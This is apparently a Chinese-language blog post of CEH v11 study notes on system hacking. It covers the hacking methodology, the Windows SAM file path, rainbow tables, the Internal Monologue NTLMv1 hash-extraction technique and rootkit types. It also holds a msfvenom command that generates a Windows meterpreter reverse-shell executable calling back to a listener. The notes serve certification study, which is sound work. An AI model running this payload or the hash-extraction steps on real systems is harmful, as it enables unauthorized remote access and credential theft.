CEH

[CEH V11]module6筆記-system hacking

CEH hacking Methodology(CHM)系統駭客流程有四個步驟

  1. Gaining Access
  2. Escalating Privileges(提權)
  3. Maintaining Access
  4. Clearing Logs

System Hacking Goals

  • a. Gaining Access
  • b. Escalating Privileges
  • c. Executing Applications
  • d. Hiding Files
  • e. Covering Tracks

windows 密碼表SAM存放路徑

c:\windows\system32\config\SAM 常在偷改密碼的人應該都很熟XD

rainbow table attack

他其實也是字典檔攻擊,只是他的字典已經轉成加密的md5等的對照表資料

Internal monologue attack

“內心獨白”(Internal Monologue)是一種攻擊技術,駭客可以提取所有已登錄用户的NTLMv1 hashes。

1.因為windows10禁止使用NetNTLMv1,所以駭客更改註冊表設定以強制電腦使用NTLMv1而不用NTLMv2。 此步骤需要管理者權限。

2.然後就可以透過進程去找非網路登錄(non-network login) tokens的列表

3.用此tokens模擬用户同 NTLM SSP 進行交互,控制 Challenge 为固定值,導出返回的 Net-NTLMv1 。

Types of Rootkids

  • Hypervisor Level Rootkit-改出一個VM
  • Hardware/Firmware Rootkit-改bios那種
  • Kernel Level Rootkit-更改系統kernel或是驅動
  • Boot Loader Level Rootkit-改開機順序
  • Application Level/User Mode rootkit-改應用程式
  • Library level Rootkit-更改DLL檔

攻擊工具msfvenom

生成 Shellcode 並獲得 Shell 訪問權限

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

John the Ripper

John The Ripper是一個免費的密碼破解工具。它最初為Unix作業系統開發,但可以在十五種不同的平台上運行。它是最常用的密碼測試和破解程序之一

Be the First to comment.

Leave a Comment

發佈留言必須填寫的電子郵件地址不會公開。

(若看不到驗證碼,請重新整理網頁。)